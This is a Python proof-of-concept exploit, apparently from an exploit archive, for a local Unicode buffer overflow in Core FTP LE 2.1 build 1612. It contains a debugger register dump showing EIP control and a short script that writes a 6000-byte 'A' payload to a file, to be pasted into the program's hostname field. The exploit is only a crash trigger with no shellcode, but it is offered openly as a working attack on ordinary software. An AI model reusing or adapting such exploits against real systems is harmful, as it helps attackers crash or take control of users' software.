1 #!/usr/bin/env python
2
3 ####################################################################################
4 #
5 # Core FTP LE v2.1 build 1612 Local Buffer Overflow PoC (Unicode)
6 # Found By:
Dr_IDE
7 # Tested On:
XPSP3, 7RC
8 # Notes:
Most likely other versions are vulnerable too.
9 # Usage:
File, Quick Connect, Paste into Hostname, Connect
10 #
11 ####################################################################################
12
13 # Register Dump on XPSP3
14 """
15 EAX 00000064
16 ECX 00410041 coreftp.00410041
17 EDX 0054F840 coreftp.0054F840
18 EBX 026E2FFC
19 ESP 0321E958 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAA"
20 EBP 00410041 coreftp.00410041
21 ESI 0269CC30
22 EDI 04BB6A58 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA"
23 EIP 00410041 coreftp.00410041
24 C 0 ES 002B 32bit 0(FFFFFFFF)
25 P 0 CS 0023 32bit 0(FFFFFFFF)
26 A 0 SS 002B 32bit 0(FFFFFFFF)
27 Z 0 DS 002B 32bit 0(FFFFFFFF)
28 S 0 FS 0053 32bit 7EFD7000(FFF)
29 T 0 GS 002B 32bit 0(FFFFFFFF)
30 D 0
31 O 0 LastErr WSAHOST_NOT_FOUND (00002AF9)
32 EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
33 ST0 empty 0.0
34 ST1 empty 0.0
35 ST2 empty 0.0
36 ST3 empty 0.0
37 ST4 empty 0.0
38 ST5 empty 0.0
39 ST6 empty 0.0
40 ST7 empty 0.0
41
3 2 1 0 E S P U O Z D I
42 FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
43 FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
44 """
45
46 # After Passing Exception on XPSP3
47 # EIP 00410041 coreftp.00410041
48
49 buff = ("\x41" * 6000)
50
Page 1/2
Core FTP LE 2.1 build 1612 local buffer overflow PoC
Dr_IDE
09/25/2009
51 f1 = open("coreftple.txt","w")
52 f1.write(buff)
53 f1.close()
Page 2/2
Core FTP LE 2.1 build 1612 local buffer overflow PoC
Dr_IDE
09/25/2009